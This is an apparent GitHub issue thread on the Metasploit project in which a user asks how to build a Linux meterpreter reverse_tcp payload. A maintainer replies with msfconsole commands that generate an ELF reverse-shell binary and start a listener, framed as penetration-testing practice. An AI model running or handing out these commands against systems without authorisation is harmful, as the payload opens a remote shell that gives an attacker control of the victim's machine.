### ISSUE TITLE
MetaSploit linux file type

### ISSUE THREAD

**Issue by sasdallas** [rapid7/metasploit-framework#14193]
Hi, I am a MetaSploit user, and I want to create a linux/x64/meterpreter/reverse_tcp virus. What file format does linux use?

**Comment by adfoster-r7** [comment]
You can generate linux ELF payloads within metasploit's console:

```
use payload/linux/x64/meterpreter_reverse_tcp

# Make sure to set the right adapter / IP
set LHOST vmnet8
set LPORT 4444

# Copy this generated file on to your linux box
generate -f elf -o reverse_linux

# This creates a listener within msfconsole, now you can open the generated file on your linux box
to_handler
```

For more information, you can check out https://www.offensive-security.com/metasploit-unleashed/ - it is a free online ethical hacking course which makes a wonderful quick reference for penetration testers, red teams, and other security professionals.
